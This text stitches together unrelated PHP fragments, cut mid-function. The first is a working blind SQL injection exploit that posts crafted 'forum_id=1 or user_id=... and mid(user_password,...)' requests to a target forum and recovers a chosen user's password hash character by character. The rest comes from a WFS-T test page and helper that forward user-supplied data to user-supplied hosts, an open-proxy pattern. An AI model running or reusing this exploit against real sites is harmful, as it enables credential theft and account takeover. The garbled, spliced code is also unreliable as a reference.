$checkchar[5] = "char(53)";
$checkchar[6] = "char(54)";
$checkchar[7] = "char(55)";
$checkchar[8] = "char(56)";
$checkchar[9] = "char(57)";
$checkchar[a] = "char(97)";
$checkchar[b] = "char(98)";
$checkchar[c] = "char(99)";
$checkchar[d] = "char(100)";
$checkchar[e] = "char(101)";
$checkchar[f] = "char(102)";
for ($i = 1; $i < 33; $i++) {
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)) {
$vars = "forum_id=1+or+user_id={$the_userid_to_hack}+and+mid(user_password,{$i},1)={$checkchar[$i2]}/*";
$data = sendToHost("{$server}", 'post', "{$script}", "{$vars}");
if (eregi("{$data_to_match}", "{$data}")) {
//echo("<b>$i2</b>");
} else {
echo "<br>{$i}= {$i2}";
flush();
break;
}
}
}
function sendToHost($host, $method, $path, $data, $useragent = 1)
{
$method = strtoupper($method);
$fp = fsockopen($host, 80);
fputs($fp, "{$method} {$path} HTTP/1.1\n");
fputs($fp, "Host: {$host}\n");
echo '<meta http-equiv="Content-Type" content="text/html; charset=' . CHARSET . '">';
?>
<title>Test WFS-T operated by CCGIS</title>
</head>
<?php
if (isset($_REQUEST["filter"]) && $_REQUEST["filter"] != "" && $_REQUEST["onlineresource"] != '') {
$arURL = parse_url($_REQUEST["onlineresource"]);
$host = $arURL["host"];
$port = $arURL["port"];
if ($port == '') {
$port = 80;
}
$path = $arURL["path"];
$method = "POST";
$data = stripslashes($_REQUEST["filter"]);
$out = sendToHost($host, $port, $method, html_entity_decode($path), $data);
echo "-------------------get-------------<br>";
echo htmlentities($out);
echo "-------------------end of get-------------<br>";
}
function sendToHost($host, $port, $method, $path, $data)
{
echo "-------------------send-------------<br>";
echo $host . "<br>" . $method . "<br>" . $path . "<br>" . htmlspecialchars($data) . "<br>";
echo "-------------------end of send-------------<br>";
$buf = '';
if (empty($method)) {
$method = 'POST';
}
$method = mb_strtoupper($method);
$fp = fsockopen($host, $port);
/**
* sends the data of WFS Transaction and echos the response
*
* @param string url to send the WFS Transaction to
* @param string WFS Transaction data
*/
function doTransaction($url, $data)
{
$arURL = parse_url($url);
$host = $arURL["host"];
$port = $arURL["port"];
if ($port == '') {
$port = 80;
}
$path = $arURL["path"];
$method = "POST";
$result = sendToHost($host, $port, $method, html_entity_decode($path), $data);
//delete header from result
$result = mb_eregi_replace("^[^<]*", "", $result);
$result = mb_eregi_replace("[^>]*\$", "", $result);
echo $result;
}